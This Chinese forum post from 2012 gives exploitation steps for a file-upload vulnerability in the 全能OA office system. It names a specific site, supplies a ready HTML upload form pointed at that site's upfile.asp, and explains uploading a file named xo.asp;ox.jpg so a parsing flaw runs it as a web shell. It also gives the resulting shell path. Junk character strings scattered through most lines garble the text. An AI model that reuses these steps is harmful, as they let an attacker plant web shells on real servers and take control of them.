全能OA办公系统 上传漏洞
& O' D+ |9 \/ k3 ~
5 g1 l. r$ D1 ], s% O9 S4 K系统介绍:
4 U& E: K- Z1 y5 d, D0 F
6 Y) t/ y& V( y! M全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。8 }, q3 E* x& i
4 U0 {( u7 ]" g. o
主要功能:
k5 p5 S6 `. Q+ f& _+ i公司通告
1 c9 r9 X( i& R" g$ F" `# N9 s工作计划 " E( N [0 ?9 m, n4 ]! v; C
通讯助理
, @: f! w) H* ~# l客户资源 4 |, d Y2 ^3 H* C5 z; q3 ?( |$ [) o& v
我的公文 $ Y# }3 b, f; o. M4 v, V/ X
公文传阅 6 P$ K5 f; b, `5 N
公共资源
$ |0 ^4 Y6 y# G) S资源预约 0 U) C1 N. `$ g: X& Z+ a2 q; Y
今日考勤
- y2 s# D* @2 |8 y: d0 L5 G" u个人计划 * M( Z' `- j1 n* Q, ]2 [3 g: x3 v: J
个人通讯录
2 v5 D( Z' u) i( S5 P. [3 C个人基本档案
% B) h" S1 M- g) L7 ^未读邮件
3 y4 r! Z* ~2 f发邮件 $ P. U' w" U3 I# X% [0 [. z
收件夹
6 a/ s4 g0 M5 \- @1 N$ F/ H寄件夹 R$ v5 x7 }6 i! j
网络硬盘
) F' E$ ?$ B; e网络会议
, m' O! q6 p4 e1 z网络调查 7 D5 \, P" s3 l+ n' v
交流论坛
6 P9 x! q; b, O* o2 k
' r8 g$ l; c# W7 a8 B有兴趣测试的朋友可以下源码看看
9 [, a5 k/ @9 o+ `! d( W
9 N' C6 Z" t- W/ r+ B/ q# Y% X3 ?源码下载:
' J( N$ d! D3 Z+ R0 F9 [- a
3 A* k8 E( G2 r& A" ahttp://www.mycodes.net/30/4750.htm* W2 i# h5 S7 e! _$ s7 j
2 {& w3 h' ?% q2 P8 l漏洞介绍:
; C, v) a# @7 `9 K! M
9 _% Z& Q4 R4 N5 |由upfile.asp上传文件漏洞引起
" K/ Z8 `0 e2 p8 O4 Z; J3 R( A
" j8 E9 U. F1 ]# v测试方法:
K- H; c5 m5 i+ [( s7 }5 t4 I& q9 }: o3 i5 J/ R- B, ~
使用名小子上传http://www.itlynn.com/upfile.asp即可3 Z% }7 }2 H' Y; j
4 C0 w) b2 H0 Z0 j
如果upfile.asp文件被删除不存在。3 t& e1 G6 ~( l6 j, i. l
& |8 @* I. w9 J8 ]
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。, |! \8 w1 e$ H! V4 s
3 Q" b8 w% h8 `如果存在那么将如下代码保存为upfile.html。
- r3 z- h& B# b( J- Z; ^4 U
' N+ Y" j& Z3 B0 a+ `. v然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
9 x% t0 k# t3 n7 Q& B
# ^% P9 }( @6 o V- A# s$ n m9 G E5 ]0 J: O
' B" n, V+ f! B; F01 <table border='0' align="center" cellpadding="5"> / x: f% ?- }, b9 [- |# y
: b: u* O: d$ ^3 e
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
" M! c$ H8 G$ h1 O1 r( y
+ C6 D4 ?. B. Y( D1 X03 <tr>
. n8 H+ [) @0 k4 j' c* g) s" [# ^4 V6 [% O0 U. F r% I
04 <td>报错:</td> 7 w$ ?8 j8 Y" l0 b3 g$ p
% M7 x) W7 g5 K5 q; k
05 <td><input type='radio' name='errnumber' value='0'> - d h5 o% P% j. ^' {
h7 I1 x5 X# c' g6 h' Z
06 自动更名
8 h) r; y3 E& T# S% O5 j+ s3 o
9 |7 c8 Q) c5 Z/ ^07 <input type='radio' name='errnumber' value='1' checked>
E, y) s2 S0 B+ n" @: ]3 M3 J/ H& b, s0 ^
08 报错方式 * T' p+ o. I& ]& M
. w7 R; J/ q( g3 U) t1 `# g09 <input type='radio' name='errnumber' value='2'> ; p+ G$ G1 M6 S- _
; t2 B4 K" ^4 @10 直接覆盖</td> 1 s* c" v: t B+ h
: {4 z. l J2 z4 q, M: o& ^* y& Z
11 </tr> 9 r& B5 g7 W+ u
- R% V& T2 m U$ G8 v1 {
12 <tr>
' O, [' Y, _) M& \8 }( ]1 Q' c: K9 }; u, N a
13 <td>主题:</td>
. P6 m ^5 j3 v# Q" S& G3 G0 Z: E: c1 p. ^# J; j
14 <td><input type='text' name='filename' size='30'></td>
4 X6 h. m3 s# q& V. Z) r0 k1 r
" E! @, C' c: r. G( q15 </tr> ( f0 o- C" z+ q4 S1 l: Z
, a! b, B5 p$ u) v% \3 R16 <tr>
' K/ V/ }: f* y# ^# [: {1 O) Z
2 s7 ]: X/ ~- O' C17 <td>文件:</td> 5 A% @% Y, K5 q( V: l& [3 B* s6 b
# k) g, d0 \+ C6 ]3 v7 T18 <td><input type="file"name="fruit"size="30"></td> % o& u$ }9 m* _- n0 L
* B: R8 o( g1 r3 a2 H8 L& r
19 </tr> - t& M8 A Y' ^) [! _* ?
A% g4 a7 J( K20 <tr> 7 c y" G* y9 `1 s: M
V: X/ R# X) p" S21 <td valign='top'>简介:</td>
8 l& V6 m1 I6 T8 U. u" I |; ]' p; C9 C/ o
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
4 a d* n `" W/ f
0 f# d/ o# I6 @: N7 f% O( Y23 </tr> 8 K& K7 K+ l. K9 d
7 r6 ~0 \5 g8 m9 A# T
24
5 P7 h) Z7 i/ ^, o' W' T( J5 @7 J2 j1 V
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> / K# I2 z8 _1 s. m* _1 ~
G2 F P* e) V' {) G6 [
26 </tr> ; G& b( d) X& K
# Y' g# V Y1 w: b! r% {! h
27 </form> 6 p% k! |0 G8 f* W; D7 @
# Z0 J# `5 V& d H1 u
然后打开上传一个文件名为xo.asp;ox.jpg的文件。+ _' q1 o% U8 `) t
" D9 q4 N) k0 v( h) [ t
* ]$ k: }% L3 @5 O4 P* E9 N/ @" l) v5 g5 _
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
$ [& j$ ~- Y: W# Z
' ~+ o! k9 b- G. _% `9 {4 Z此漏洞需要配合解析漏洞利用。0 J' I& }2 k1 t6 B+ ]4 O) M
, L$ _& f, w" D2 m5 k/ }; x3 U: Q |
发表于 2012-11-21 13:45:12
收藏
支持
反对